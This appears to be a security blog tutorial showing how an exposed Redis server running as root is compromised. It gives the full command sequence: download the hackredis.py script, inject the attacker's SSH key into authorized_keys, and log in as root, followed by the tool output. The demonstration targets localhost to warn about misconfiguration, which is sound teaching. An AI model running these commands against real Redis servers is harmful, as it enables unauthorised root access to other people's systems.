This page looks best with JavaScript enabled

Obtaining root shell on redis server

 ·  🎃 kr0m

As we saw in a previous occasion, if we do not configure our redis server correctly, malicious attackers can upload webshells. This time, we detail how the root account can be compromised by starting the service with the wrong user and not filtering it through a firewall.

By default, in the installation of a redis server, the service starts with the redis user, but this time we will do it as root so that the attack is more noticeable.

We start the service, execute the binary with the config as an argument:

redis-server redis.conf

On the attacker’s side, we install the redis libraries for python:

easy_install redis

We indicate the list of targets, in this case localhost:

vi list

127.0.0.1

We download the script:

wget https://raw.githubusercontent.com/Ridter/hackredis/master/hackredis.py

We launch the attack indicating the pubkey to insert, be careful as the python script flushes the redis database:

$ python2.7 hackredis.py -l list -p 6379 -r .ssh/id_rsa.pub -sp 22 -pk .ssh/id_rsa

[*] Attacking ip:127.0.0.1
[*] Check connecting...
[+] Success !

We connect to the server and voilá, we are root:

ssh localhost -p22

#

If we check the contents of authorized_keys, it is as follows:

cat authorized_keys

REDIS0006þcrackitA
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVQnniSdSbjmAtjMfLpj5hjTRz8Xr/5pn7G43cznRXSQ3zCG6QvEqNEOxVkMfvDx+esIaINrecyD388l9gctqrXb13kE7JxQZnXW6rnJcCG96r006nR1sz7bXrj0OGRBIag53MK4fX1MhkJi6bsV4JiOEBB5bnnDvD1YuuO6zEPIl58w4h21JI7R78Zg9nWwAyNBgJsaCq4kyt1g4GpRtil00V0GERMfyKaS3CcjvSHMQKNR8INzW+BCo8KIZCUXdgl7h4qjo0064/1tCWNo6Yv1gtnjxK3nWo6AaC9Cno58RCb0FuRg+GS5LGQuKRXH8NdTYl4KG4usrtfSbO6pCf kr0m@skynet

ÿ¸æÜòWzp

This is how dangerous it can be to start services with the wrong user. This, combined with the fact that access is not filtered in any way, leads to a nice root shell.

If you liked the article, you can treat me to a RedBull here